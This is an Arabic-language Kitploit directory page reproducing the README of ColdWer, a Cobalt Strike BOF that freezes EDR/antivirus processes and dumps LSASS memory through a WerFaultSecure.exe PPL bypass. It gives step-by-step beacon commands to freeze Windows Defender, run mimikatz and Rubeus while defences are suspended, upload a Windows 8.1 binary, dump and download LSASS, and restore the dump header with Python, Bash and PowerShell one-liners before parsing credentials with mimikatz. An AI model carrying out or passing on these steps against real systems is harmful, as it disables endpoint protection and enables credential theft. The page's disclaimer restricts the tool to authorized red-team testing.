Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ColdWer — Cobalt Strike BOF لتجميد عمليات EDR/AV وتفريغ LSASS باستخدام تجاوز PPL عبر WerFaultSecure.exe | Kitploit
أدوات/GitHubGitHub/0xsh3llf1r3/coldwer
تصعيد الامتيازاتالاستغلالالحركة الجانبيةما بعد الاستغلالالفريق الأحمرتطوير الحمولات
GitHub0xsh3llf1r3/coldwer

ColdWer

Cobalt Strike BOF لتجميد عمليات EDR/AV وتفريغ LSASS باستخدام تجاوز PPL عبر WerFaultSecure.exe

عرض المستودع
14423منذ 6 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ColdWer
حرب باردة على نقطة النهاية الخاصة بك.

Stars Forks License


🥶 ColdWer

ColdWer يستخدم ثغرة تجاوز PPL لـ WerFaultSecure.exe لتجميد عمليات EDR/AV وتفريغ ذاكرة LSASS على أنظمة Windows الحديثة.

root@kitploit:~
C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)

جمّد EDR/AV الخاص بك. استخرج ما تحتاج. ابقَ بارداً.


👤 المؤلف

Sh3llf1r3 (@0xsh3llf1r3)


🙏 الإسناد

يعتمد هذا المشروع على أبحاث TwoSevenOneT (@TwoSevenOneT):

المشروعالوصف
EDR-Freezeتقنية تجميد EDR الأصلية
WSASSتفريغ LSASS عبر WerFaultSecure

كل الفضل للتقنيات الأساسية يعود إلى TwoSevenOneT.


🔥 الميزات


🚀 بدء الاستخدام

📋 المتطلبات الأساسية

  • Cobalt Strike 4.x
  • beacon ذو سلامة عالية (Administrator/SYSTEM)

💾 التثبيت

  1. استنساخ المستودع:
root@kitploit:~
git clone https://github.com/0xsh3llf1r3/ColdWer.git
  1. تحميل سكريبت aggressor في Cobalt Strike:
  • اذهب إلى Cobalt Strike → Script Manager
  • انقر Load
  • اختر cw/coldwer.cna

📦 البناء من المصدر

root@kitploit:~
# انتقل إلى دليل المصدر
cd src/

# ترجمة BOF (يتطلب MinGW)
make

# أو يدويًا:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

📥 تحميل سريع

  1. اذهب إلى الإصدارات
  2. حمّل coldwer.o و coldwer.cna
  3. ضع كليهما في نفس المجلد
  4. حمّل coldwer.cna في Cobalt Strike

🖥️ الاستخدام

❄️ تجميد EDR/AV

root@kitploit:~
# ابحث عن PID لـ Windows Defender
beacon> ps

# جمّد العملية
beacon> cw-freeze 1337

# نفّذ أوامرك أثناء تجميد EDR/AV
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# فك التجميد عند الانتهاء
beacon> cw-unfreeze

🔓 تفريغ LSASS

root@kitploit:~

# الخطوة 1: رفع WerFaultSecure.exe من Win8.1
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# الخطوة 2: ابحث عن PID لـ LSASS
beacon> ps

# الخطوة 3: تفريغ LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# الخطوة 4: تنزيل التفريغ
beacon> download C:\Windows\Temp\lsass.dmp

🔧 بعد التنزيل

غيّر رأس الملف لاستعادة تنسيق minidump:

الأصلي (PNG)غيّره إلى (MDMP)
89 50 4E 474D 44 4D 50

أوامر استعادة الرأس:

الطريقةالأمر
Pythonopen('lsass.dmp','r+b').write(b'MDMP')
Bashprintf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
PowerShell$f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

ثم حلّل باستخدام Mimikatz:

root@kitploit:~
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

📋 الأوامر

الأمرالوصف
cw-freeze <PID> [Path]تجميد عملية
cw-unfreezeفك تجميد العملية المجمدة سابقًا
cw-dump <PID> <Path>تفريغ ذاكرة LSASS

📝 أمثلة

root@kitploit:~
# تجميد باستخدام المسار الافتراضي
beacon> cw-freeze 1337

# استخدام WerFaultSecure.exe مخصص
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# تفريغ LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# فك التجميد عند الانتهاء
beacon> cw-unfreeze

✅ الأهداف المدعومة

الهدفالحالة
Windows Defender (MsMpEng.exe)✅ يعمل
LSASS (lsass.exe)✅ يعمل
عمليات PPL الأخرى✅ يعمل

⚠️ القيود

لا يعمل ضد EDRs التي تمتلك حماية ذاتية في وضع kernel:

EDRالحالة
Elastic Endpoint❌ محظور
CrowdStrike Falcon❌ محظور
SentinelOne❌ محظور
Carbon Black❌ محظور

⚙️ كيف يعمل

root@kitploit:~
1. 🚀 تشغيل WerFaultSecure.exe كـ PPL (مستوى WinTcb)
                    ↓
2. 🎯 WerFaultSecure يلتصق بالعملية المستهدفة
                    ↓
3. ⏸️  MiniDumpWriteDump يعلق جميع خيوط العملية المستهدفة
                    ↓
4. 🥶 تعليق WerFaultSecure نفسه → تبقى العملية الهدف مجمدة
                    ↓
5. ✅ تنفيذ أوامرك (EDR/AV لا تستطيع الرؤية!)
                    ↓
6. 🔥 إنهاء WerFaultSecure → تفك تجميد العملية الهدف

🔑 لماذا WerFaultSecure من Win8.1؟

الإصدارالمخرجات
Windows 10/11تفريغ مشفر فقط
Windows 8.1تفريغ خام غير مشفر

🔍 استكشاف الأخطاء وإصلاحها


⚖️ إخلاء المسؤولية

root@kitploit:~
⚠️ لاختبارات الأمن المصرح بها فقط

هذه الأداة مخصصة لـ:
- اختبار الاختراق المأذون به
- عمليات الفريق الأحمر بإذن كتابي
- أبحاث الأمن في بيئات خاضعة للرقابة

المؤلف غير مسؤول عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

📜 الترخيص

رخصة MIT - انظر LICENSE


🥶 ابقَ بارداً. ابقَ هادئاً. 🥶

⭐ قم بتنجيم هذا المستودع إذا وجدته مفيدًا! ⭐

تنزيل الأداة
الميزةالوصف
❄️ تجميدوضع عمليات EDR/AV في حالة غيبوبة
🔓 تفريغاستخراج ذاكرة LSASS متجاوزًا PPL
🛡️ تجاوز PPLالاستفادة من WerFaultSecure.exe على مستوى WinTcb
⚡ سريعتنفيذ BOF مباشر
🎯 تحكم يدويأنت من يقرر متى تجمد وتفك التجميد
الخطأالسببالحل
الملف غير موجودمسار غير صحيحتحقق من مسار WerFaultSecure.exe
تم رفض الوصولصلاحيات منخفضةتشغيل كـ Administrator/SYSTEM
توقيع غير صالحملف ثنائي غير موقعاستخدم WerFaultSecure.exe موقعًا بشكل صحيح
العملية غير موجودةPID خاطئتحقق من PID باستخدام الأمر ps
الهدف محميحماية kernelEDR لديه حماية ذاتية (لا يمكن تجاوزها)
مجمد بالفعلحالة عالقةقم بتشغيل cw-unfreeze أولاً